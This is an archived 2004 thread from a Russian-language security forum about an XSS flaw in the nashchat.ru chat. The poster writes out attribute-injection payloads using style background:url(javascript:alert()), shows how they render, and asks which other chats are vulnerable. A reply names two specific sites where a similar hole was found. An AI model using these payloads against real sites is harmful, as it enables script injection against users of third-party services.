ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.06.2004, 11:15
Format C:
Новичок
Регистрация: 31.05.2004
Сообщений: 6
Провел на форуме:
1324

Репутация: 0
Отправить сообщение для Format C: с помощью ICQ
Post

в чате nashchat.ru нашёл уязвимость:
если пишешь что-то типа </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">http://www.some.ru[/QUOTE]<span id='postcolor'> то это преобразуется в ссылку. В чате отоброжается как:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><a href="http://www.somechat.ru">http://www.somechat.ru</a>
[/QUOTE]<span id='postcolor'>
А если так:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">http://www.some.ru"style="background:url(javascript:alert ())
[/QUOTE]<span id='postcolor'>

А чтоб твоё сообщение не было видно:

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">http://www.somechat.ru"style="background:url(javascript:a lert())"aaa=`>[/QUOTE]<span id='postcolor'>

Тогда в чате отображается как:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><a href="http://www.somechat.ru"style="background:url(javascript:a lert())"aaa=`>">http://www.somechat.ru"style="background:url(javascript:a lert())"aaa=`></a>
[/QUOTE]<span id='postcolor'>
Проблема в том, что в скрипте нельзя использовать пробелы(&amp; не пропускается). Сейчас баг исправили, но я думаю что такую фигню можно сделать на некоторых других чатах. (Ни кто не знает на каких? )
&quot;'`&lt;&gt;\%&amp;
 
Ответить с цитированием

  #2  
Старый 28.06.2004, 12:01
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

Большинство чатов фильтруют кавычку в ссылках, поэтому это не работает. Но иногда прокатывает, например вот здесь я находил подобную уязвимость http://cafe.chanson.ru и здесь http://join.chillout.net.ru/join.thtml
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ